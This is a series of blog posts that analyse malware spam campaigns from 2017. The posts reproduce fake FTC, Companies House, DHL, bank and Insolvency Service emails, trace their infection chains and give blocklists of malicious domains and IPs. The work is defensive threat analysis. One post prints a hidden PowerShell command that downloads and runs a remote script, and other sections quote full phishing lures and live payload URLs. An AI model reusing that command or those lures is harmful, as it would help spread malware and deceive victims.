Malware spam: "RE: RE: ftc refund" / secretary@ftccomplaintassistant.com

This fake FTC email leads to malware. Curiously, it was sent to a company that received a multimillion dollar FTC fine, but this is almost definitely a coincidence.

From:    Federal Trade Commission [secretary@ftccomplaintassistant.com]
Date:    17 April 2017 at 15:25
Subject:    RE: RE: ftc refund


It seems we can claim a refund from the FTC.
Check this out and give me a call.
https://www.ftc.gov/refunds/company/companyname.com/FTC_refund_recipientname.doc
Thank you
James Newman
Senior Accountant
secretary@ftccomplaintassistant.com
212-0061570

The link in the email actually goes to a URL beginning http://thecomplete180.com/view.php?id= followed by a Base 64 encoded string that appears to be 6281 + recipient email address + 5434 (so for president@whitehouse.gov it would be http://thecomplete180.com/view.php?id=NjI4MXByZXNpZGVudEB3aGl0ZWhvdXNlLmdvdjU0MzQ=)

Obviously this downloaded document is up to no good, but the VirusTotal detection rates are only 5/56. The Word document itself tries to persuade victims to enable macros, which would be a bad idea.

Automated analysis [1] [2] shows network traffic to:

wasstalwihis.com/bdk/gate.php
littperevengpa.com/ls5/forum.php
littperevengpa.com/mlu/forum.php
littperevengpa.com/d1/about.php
hybridinformatica.com.br/blog/wp-content/themes/twentyeleven/inc/a1
hybridinformatica.com.br/blog/wp-content/themes/twentyeleven/inc/1
hybridinformatica.com.br/blog/wp-content/themes/twentyeleven/inc/2

It also appears to start sending traffic via Tor, which is a good reason to monitor Tor on your network. All sorts of files are dropped, most of which don't seem to be particularly malicious. "Gate.php" indicates a Pony downloader, but this does look like a tricky bugger.

Out of the domains contacted, littperevengpa.com and wasstalwihis.com shared the same registrant details and look fairly evil. We can associate the same registrant with the following domains:

soinwarep.com
ronwronsednot.com
withwasnothar.com
dingandrinfe.com
troverylit.com
derby-au.com
utonerutoft.com
situghlacsof.com
tinjecofsand.com
fortotrolhec.com
fydoratot.com
redwronwassdo.com
ronkeddari.com
littperevengpa.com
suranfortrep.com
newbillingplace.com
usps-daily-delivery.com
ringcentral-fax-inbox.com
wassheckgehan.com
wasstalwihis.com
meredondidn.com
satertdiut.com
vernothesled.com
veuntedund.com
ranwithtorsdo.com
notwipaar.com
dintrogela.com
adp-monthly-billling.com
rigakeddo.com
random-billing.com
hetoftinbut.com
hemlittratdidn.com

Perhaps more usefully, we can associate that registrant with the following IPs:

178.170.189.254 [hostname: nejokexulag.example.com] (Servachok Ltd, Russia)
185.146.1.4 (PS Internet Company LLC, Kazakhstan)
185.48.56.63 (Sinarohost, Netherlands)
185.80.53.76 (HZ Hosting, Bulgaria)
188.127.237.232 (SmartApe, Russia)
193.105.240.2 (Sia Vps Hosting, Latvia)
194.1.239.63 [hostname: nejokexulag.example.com] (Internet Hosting Ltd, Russia)
195.54.163.94 (PE Dobrogivskiy Muroslav Petrovich, Ukraine)
212.116.113.108 (Prometey Ltd, Russia)
46.148.26.87 [hostname: nejokexulag.infium.net] (Infium UAB, Ukraine)
47.90.202.88 (Alibaba.com, China)
77.246.149.100 [hostname: nejokexulag.e-vds.ru] (E-planet Ltd, Russia)
87.118.126.207 (Keyweb AG, Germany)
88.214.236.158 (Overoptic Systems, Russia)
91.230.211.67 [hostname: nejokexulag.freeopti.ru] (Optibit LLC, Russia)
93.189.43.36 (NTCOM, Russia)

This gives us a pretty useful minimum blocklist:

178.170.189.254
185.146.1.4
185.48.56.63
185.80.53.76
188.127.237.232
193.105.240.2
194.1.239.63
195.54.163.94
212.116.113.108
46.148.26.87
47.90.202.88
77.246.149.100
87.118.126.207
88.214.236.158
91.230.211.67
93.189.43.36

Malware spam: "Company Documents" / WebFilling@companieshousemail.co.uk and companieshouseemail.co.uk plus others

This spam email does not come from Companies House, but is instead a simple forgery with a malicious attachment:

From:    Companies House [WebFilling@companieshousemail.co.uk]
Date:    13 April 2017 at 11:10
Subject:    Company Documents
Signed by:    companieshousemail.co.uk

Company Documents This message has been generated in response to the company complaint submitted to Companies House WebFiling service. Please note: all forms must be answered or the form will be returned. Service Desk tel +44 (0)303 8097 432 or email enquiries@companieshouse.gov.uk Note: This email was sent from a notification-only email address which cannot accept incoming email. Please do not reply directly to this message.   Companies House  Crown way Maindy Cardiff CF14 3UZ

Documents.doc 48K

---

I observed the email coming from the fake domains companieshousemail.co.uk and companieshouseemail.co.uk  but it looks like there may be more. Email is being send from servers in the 94.237.36.0/24 range (Upcloud Ltd, Finland) and I can see other servers set up to do the same thing:

companieshouseemail.co.uk  94.237.36.104
companieshouseemail.co.uk  94.237.36.145
companieshousemail.co.uk  94.237.36.146
companieshousemail.co.uk  94.237.36.147
companieshousesecure.co.uk  94.237.36.150
companieshousesecure.co.uk  94.237.36.151

Blocking email from the entire 94.237.36.0/24 range at least temporarily might be prudent.

The WHOIS details for these indicate they were registered today with presumably fake details, but that the registrar Nominet have somehow "verified".

Registrant:
Charlene hogg

Registrant type:
Unknown

Registrant's address:
37 Maberley Road
London
SE19 2JA
United Kingdom

Data validation:
Nominet was able to match the registrant's name and address against a 3rd party data source on 13-Apr-2017

Registrar:
GoDaddy.com, LLP. [Tag = GODADDY]
URL: http://uk.godaddy.com

Relevant dates:
Registered on: 13-Apr-2017
Expiry date:  13-Apr-2019
Last updated:  13-Apr-2017

Registration status:
Registered until expiry date.

Name servers:
ns29.domaincontrol.com
ns30.domaincontrol.com

All the attachments I have seen are the same with a current detection rate of 6/55. Hybrid Analysis of the document shows it downloading a component from shuswapcomputer.ca/images/banners/bannerlogo.png and a malicious executable %APPDATA%\pnwshqr.exe is dropped with a detection rate of 14/62.

Automated analysis of the binary [1] [2] show potentially malicious traffic going to:

107.181.161.221 (Total Server Solutions, US)
185.25.51.118 (Informacines sistemos ir technologijos UAB aka bacloud,com, Lithuania)

There are probably other destinations too. The payload appears to be Dyre / Dyreza.

Recommended blocklist:
94.237.36.0/24 (temporary email block only)
shuswapcomputer.ca
185.25.51.118
107.181.161.221

Malware spam: "DHL Urgent Delivery"

This fake DHL spam includes the recipients real name. In this case it was sent to someone in Germany, but written in English. The malware payload is identical to this one in Polish.

Von: DHL Parcel [mailto:info@glaefcke.de]
Gesendet: Dienstag, 11. April 2017 11:03
An: [redacted]
Betreff: DHL Urgent Delivery

YOUR DELIVERY IS TODAY


Hi, [redacted]

The scheduled delivery is Tue Apr 11 2017 before End of Day.

Please check your shipment and contact details below. If you need to make a change or track your shipment, click

http://nolp.dhl.com/set_identcodes.do&email=[redacted] . (JS-Document)
SHIPMENT CONTENTS:DELIVERY INFORMATION


Shipment number: 9670515551
Scheduled Delivery Date: Tue Apr 11 2017
Delivery Time: before End of Day
Email Address: [redacted]

Thank you for using On Demand Delivery.

DHL Express - Excellence. Simply delivered. 

Malware spam: "Sprawdź stan przesylki DHL"

This spam targeting Polish victims seems quite widespread. It leads to malware. The email is personalised with the victim's real name which has been harvested from somewhere.

From: DHL Express (Poland) [mailto:biuro@nawigatorxxi.pl]
Sent: Monday, April 10, 2017 7:09 PM
To: [redacted]
Subject: Sprawdź stan przesylki DHL

Sprawdź stan przesylki DHL
Szanowny Kliencie, [redacted]

Informujemy, że w serwisie DHL24 zostało zarejestrowane zlecenie realizacji przesyłki, której jesteś odbiorcą.

Dane zlecenia:
- numer zlecenia:
9653788657

- data złożenia zlecenia:
poniedziałek, 10. kwietnia

Informacje o aktualnym statusie przesyłki znajdziesz na http://dhl24.com.pl/report.html&report=JavaScript&email=[redacted]. (JavaScript Raport)

Niniejsza wiadomość została wygenerowana automatycznie.

Dziękujemy za skorzystanie z naszych usług i aplikacji DHL24.

DHL Parcel (Poland)

UWAGA: Wiadomość ta została wygenerowana automatycznie. Prosimy nie odpowiadać funkcją Reply/Odpowiedz 

The link goes to a malicious Javascript [example here] [Malwr report] which downloads a binary from:

freight.eu.com/download3696 (159.100.181.107 - World Wide Web Hosting LLC, Netherlands)

..this has a detection rate of 10/60. This Malwr report plus observed activity show traffic to the following IPs and ports:

5.196.73.150:443 (OVH, France)
31.220.44.11:8080 (HostHatch, Netherlands)
46.165.212.76:8080 (Leaseweb, Germany)
109.228.13.169:443 (Fasthosts, UK)
119.82.27.246:8080 (Tsukaeru.net, Japan)
173.230.137.155:8080 (Linode, US)
173.255.229.121:443 (Linode, US)
203.121.145.40:8080 (Pacific Internet, Thailand)
206.214.220.79:8080 (ServInt, US)

There may be other phone home locations not observed.

Recommended blocklist:
5.196.73.150
31.220.44.11
46.165.212.76
109.228.13.169
119.82.27.246
159.100.181.107
173.230.137.155
173.255.229.121
203.121.145.40
206.214.220.79

Malware spam: "Re:Payment Remittance Copy"

This fake financial spam leads to malware.

From:    AL HUDA LTD [ap.office@triumftools.sk]
Date:    30 March 2017 at 09:05
Subject:    Re:Payment Remittance Copy
Signed by:    triumftools.sk

Dear Sir,

As instructed by your customer for your payment,

Find attached formal remittance copy received from our bank and contact your  client for payment confirmation. All payment details is in the attached HSBC TT-Copy.

Please Confirm

Best regards,
================================

Alan Bostock
Manager - Finance and Administration
HSBC Exchanger
TEL: (965) 24338094 -620                                  
FAX: (965) 24332815 Mobile: (965) 600-11-868
==================================

Attached is a .GZ archive HSBC TT-Copy.pdf.gz (this assumes you have a program on your Windows PC that can handle .gz files). This contains a malicious executable doc9876543234500001.exe which currently has a VirusTotal detection rate of 32/60.

Analysis of the binary is pending. You can be certain that it is nothing good.

More highly personalised malspam using hijacked domains

Following on from this spam some weeks ago, another one comes in using a broadly similar technique of including the potential victim's real home address while using apparently hijacked infrastructure (although in this case the hijacking isn't so elaborate).

From: customerservice@newshocks.com [mailto:customerservice@newshocks.com]
Sent: 15 March 2017 18:23
Subject: [Redacted] Your order 003009 details

Hello [redacted], We are delighted to confirm details of your recent order 003009. We will email you again as soon as the items you have chosen are on their way to you. If you have an online account with us, you can log in here to see the current status of your order. You will receive another e-mail from us when we have despatched your order. Information on order 003009 status here All prices include VAT at the current rate. A full VAT receipt will be included with your order. Delivery Address: [Name and address redacted] If you have any questions, or something about your order isn't right, please contact us. Or you can simply reply to this e-mail. Best regards and many thanks,

Contact Us Opening Times Delivery Options Returns Policy Privacy Policy Terms & Conditions

The newshocks.com domain used in the "From" field matches the sending server of rel209.newshocks.com (also mail.newshocks.com) on 185.141.164.209. This appears to be a legitimate but unused domain belonging to a distributor of car parts.

The link in the email goes to clipartwin.com/customers/customer-status-003009-verified which is currently 404ing so I can't tell what the payload is, although the previous payload appears to be Ramnit or similar. This is using another hijacked but apparently legitimate web server.

I don't know where the data has leaked from, but in this case the victim had lived at the address for the past four years.. so the leak cannot be ancient. If you have seen something similar or have an idea of where the data came from, please leave a comment below.

Malware spam: "RBC - Secure Message" / service@rbc-secure-message.com

This fake banking email leads to some sort of malware:

---

From:    RBC - Royal Bank [service@rbc-secure-message.com]
Date:    15 February 2017 at 17:50
Subject:    RBC - Secure Message
Signed by:    rbc-secure-message.com

Secure Message This is an automated message send by Royal Bank Secure Messaging Server. To ensure both you and the RBC Royal Bank comply with current legislation, this message has been encrypted. Please check attached documents for more information. Note: You should not store confidential information unless it is encrypted. CONFIDENTIALITY NOTICE:The contents of this email message and any attachments are intended solely for the addressee(s)and may contain confidential and/or privileged information and may be legally protected from disclosure. If you are not the recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments. If you are not the recipient, you are hereby notified that any use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.

RBCSecureMessage.doc 44K

---

Attached is a file RBCSecureMessage.doc which contains some sort of macro-based malware. It displays the following page to entice victims to disable their security settings.

Automated analysis is inconclusive [1] [2].  The domain rbc-secure-message.com is fake and has been registered solely for this purpose of malware distribution. In all the samples I saw, the sending IP was 64.91.248.146 (Liquidweb, US) but it does look like all these IPs in the neighbourhood are involved in the same activity:

64.91.248.137
64.91.248.146
64.91.248.148
64.91.248.150

I recommend you block 64.91.248.128/27 at your email gateway to be sure.

Highly personalised malspam making extensive use of hijacked domains

This spam email contained not only the intended victim's name, but also their home address and an apparently valid mobile telephone number:

Sent: 14 February 2017 13:52
To: [redacted]
From: <customer@localpoolrepair.com>
Subject: Mr [Redacted] Your order G29804772-064 confirmation


Dear Mr [redacted],

Thank you for placing an order with us.

For your reference your order number is G29804772-064.

Please note this is an automated email. Please do not reply to this email.

Get your order G29804772-064 details

Your order has been placed and items in stock will be sent to the address shown below. Please check all the details of the order to ensure they are correct as we will be unable to make changes once the order has been processed. You will have been notified at the point of order if an item is out of stock already with expected delivery date.

Delivery Address
[address redacted]
[telephone number redacted]

Delivery Method:
Standard Delivery

Your Order Information
Prices include VAT at 20%

Customer Service Feedback
We are always working to improve the products and service we provide to our customers - we do this through a continual review of the product range, and ongoing training of our Customer Service Team. We continually strive to improve our levels of service and we welcome feedback from our customers regarding your buying experience and the product you receive.

Feefo Independent Reviews
21 days after your purchase, you will receive an email from the independent feedback company Feefo. It takes less than a minute to complete and we'd really appreciate your feedback!


IMPORTANT INFORMATION ABOUT YOUR ORDER

Delivery

Order Tracking
Once your order has left our warehouse we will email you to confirm that the items have been shipped and include tracking details of the parcel so that you may track delivery progress directly with our courier company.

Stock Availability
On very rare occasions not every item will be available when we come to pack and despatch your order. If this is the case you will receive an email from us letting you know which items are affected and an expected delivery time.

Product Returns
All items purchased are covered by our customer friendly returns policy. Please visit for full details.
Thank you for placing your order with us. We really appreciate your custom and will do everything within our power to ensure you get the very best of service.

The data in the spam was identifiable as being a few years old. The intended victim does not appear on the haveibeenpwned.com database. My assumption is that this information has been harvested from an undisclosed data breach.

I was not able to extract the final payload, however the infection path is as follows:

http://bebracelet.com/customerarea/notification-processing-G29804772-064.doc
--> http://customer.abudusolicitors.com/customerarea/notification-processing-G29804772-064.doc
--> https://customer.affiliate-labs.net/customerarea/notification-processing-G29804772-064.zip

This ZIP file actually contains a .lnk file with the following Powershell command embedded in it:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -nologo -c IEX ((New-Object Net.WebClient).DownloadString('http://cristianinho.com/lenty/reasy.ps1'));

I couldn't get a response from the server at cristianinho.com [5.152.199.228 - Redstation, UK], this looks like a possibly legitimate but hijacked domain that uses nameservers belonging to Namecheap. But that's not the only Namecheap connection, because the two "customer" subdomains are also using Namecheap hosting (for the record the subdomains are hosted on - 185.130.207.37 and 185.141.165.204 which is Host1Plus, UK / Digital Energy Technologies, DE).

Three connection to Namecheap is worrying, and certainly we've seen hijacking patterns involving other domain registrars. Or it could just be a coincidence..

The email originated from mx119.argozelo.info on 188.214.88.119 (Hzone, Romania). Just on a hunch, I checked the domain argozelo.info and it appears to be a wholly legitimate site about a Portuguese village, registered at GoDaddy hosted on Blogger. So why does it need a dedicated mail server?

Well.. this particular rabbit hole goes a little deeper. mx119 gives a clue that there might be more than one mailsever, and indeed there are 34 of the critters name mx110.argozelo.info through to mx143.argozelo.info hosted on 188.214.88.110 through 188.214.88.142. But according to Wikipedia, Argozelo only has about 700 inhabitants, so it seems unlikely that they'd need 34 mailservers in Romania.

So, my guess is that argozelo.info has also been hijacked, and hostnames set up for each of the mailservers. But we're not quite finished with this rabbit hole yet. Oh no.

What caught my eye was a mailserver on 188.214.88.110 (the same as mx110.argozelo.info) named mail.localpoolrepair.com which certainly rang a bell because the email was apparently from customer@localpoolrepair.com - yeah, OK.. the "From" in an email can be anything but this can't be a coincidence.

localpoolrepair.com appears to be a legitimate but unused GoDaddy-registered domain, hosted at an Athenix facility in the US. So why is there a mailserver in a Romanian IP block? A DIG at the records for this domain are revealing:

 Query for localpoolrepair.com type=255 class=1
  localpoolrepair.com SOA (Zone of Authority)
        Primary NS: dns.site5.com
        Responsible person: hostmaster@site5.com
        serial:2017021207
        refresh:3600s (60 minutes)
        retry:3600s (60 minutes)
        expire:604800s (7 days)
        minimum-ttl:3600s (60 minutes)
  localpoolrepair.com A (Address) 143.95.232.95
  localpoolrepair.com MX (Mail Exchanger) Priority: 10 mail.localpoolrepair.com
  localpoolrepair.com NS (Nameserver) dns2.site5.com
  localpoolrepair.com NS (Nameserver) dns.site5.com
  localpoolrepair.com TXT (Text Field)
    v=spf1 ip4:188.214.88.110/31 ip4:188.214.88.112/28 ip4:188.214.88.128/29 ip4:188.214.88.136/30 ip4:188.214.88.140/31 ip4:188.214.88.142/32  ~all

So.. the SPF records are valid for sending servers in the 188.214.88.110 through 188.214.88.142 range. It looks to me as if localpoolrepair.com has been hijacked and these SPF records added to it.

So we have hijacked legitimate domains with presumably a neutral or good reputation, and we have valid SPF records. This means that the spam will have decent deliverability. And then the spam itself addresses the victim by name and has personal details presumably stolen in a data breach. Could you trust yourself not to click the link?

Recommended blocklist (email)
188.214.88.0/24

Recommended blocklist (web)
5.152.199.228
185.130.207.37
185.141.165.204

Malware spam: "The Insolvency Service" / "Investigations Inquiry Notification" / chucktowncheckin.com / chapelnash.com

This malware spam in unusual in many respects. The payload may be some sort of ransomware [UPDATE: this appears to be Cerber].

From: The Insolvency Service [mailto:service@chucktowncheckin.com]
Sent: 19 January 2017 12:22
Subject: EGY 318NHAR12 - Investigations Inquiry Notification



Company Investigations Inquiry
Informing You that we have received appeal regarding your company which indicates corporate misconduct.
Your Inquiry Number: 84725UPTN583
As part of this occasion we have made our own background investigation and if it occurs to be in the public interest, we can apply to the court to wind up the company and stop it trading.
Also if the performance of the director(s) who run the company is questionable enough, we can commence proceedings to disqualify them from governing a limited company for a time span up to 15 years.
FURTHER CASE DATA
The investigation can give us information that we can transmit to another regulatory body that has more suitable powers to deal with any concerns the investigation uncovers.
Help Cookies Contact Terms and conditions Rhestr o Wasanaethau Cymraeg
Built by the Government Digital Service
All content is available under the Open Government Licence v3.0, except where otherwise stated   
© Crown copyright

Sample subjects are:

LSV 354EMPU31 -  Investigations Inquiry Reminder
JXI 647TESR39 -  Investigations Inquiry Reminder
SHV 622WYXP68 -  Investigations Inquiry Notice
QPY 661APWZ41 -  Investigations Inquiry Notice
FHF 338SYBV85 -  Investigations Inquiry Notice
EGY 318NHAR12 -  Investigations Inquiry Notification
IZJ 296CNWP92 -  Investigations Inquiry Notice

All the senders I have seen come from the chucktowncheckin.com domain. Furthermore, all of the sending servers are in the same /24:

194.87.216.87
194.87.216.62
194.87.216.40
194.87.216.43
194.87.216.3
194.87.216.7
194.87.216.80

All the servers have names like kvm42.chapelnash.com in a network block controlled by Reg.ru in Russia.

The link in the email goes to some hacked WordPress site or other, then ends up on a subdomain of uk-insolvencydirect.com e.g. 2vo4.uk-insolvencydirect.com/sending_data/in_cgi/bbwp/cases/Inquiry.php - this is a pretty convincing looking page spoofing the UK government, asking for a CAPTCHA to download the files:

Entering the CAPTCHA downloads a ZIP file (e.g. 3d6Zy.zip) containing a malicious Javascript (e.g. Inquiry Details.js) that looks like this [Pastebin].

Hybrid Analysis of the script is rather interesting, not least because it performs NSLOOKUPs against OpenDNS servers (which is a really weird thing to do give that OpenDNS is a security tool).

The script downloads a component from www.studiolegaleabbruzzese.com/wp-content/plugins/urxwhbnw3ez/flight_4832.pdf and then drops an EXE with an MD5 of e403129a69b5dcfff95362738ce8f241 and a detection rate of 5/53.

Narrowing the Hybrid Analysis down to just the dropped EXE, we can see these peculiar OpenDNS requests as the malware tries to reach out to:

soumakereceivedthiswith.ru (176.98.52.157 - FLP Sidorenko Aleksandr Aleksandrovich, Russia)
sectionpermiathefor.ru (151.0.42.255 - Online Technologies, Ukraine)
programuserandussource.ru (does not resolve)
maytermsmodiall.ru (does not resolve)

It isn't exactly clear what the malware does, but you can bet it is Nothing Good™.

I recommend that you block email traffic from:

194.87.216.0/24

and block web traffic to

uk-insolvencydirect.com
studiolegaleabbruzzese.com
176.98.52.157
151.0.42.255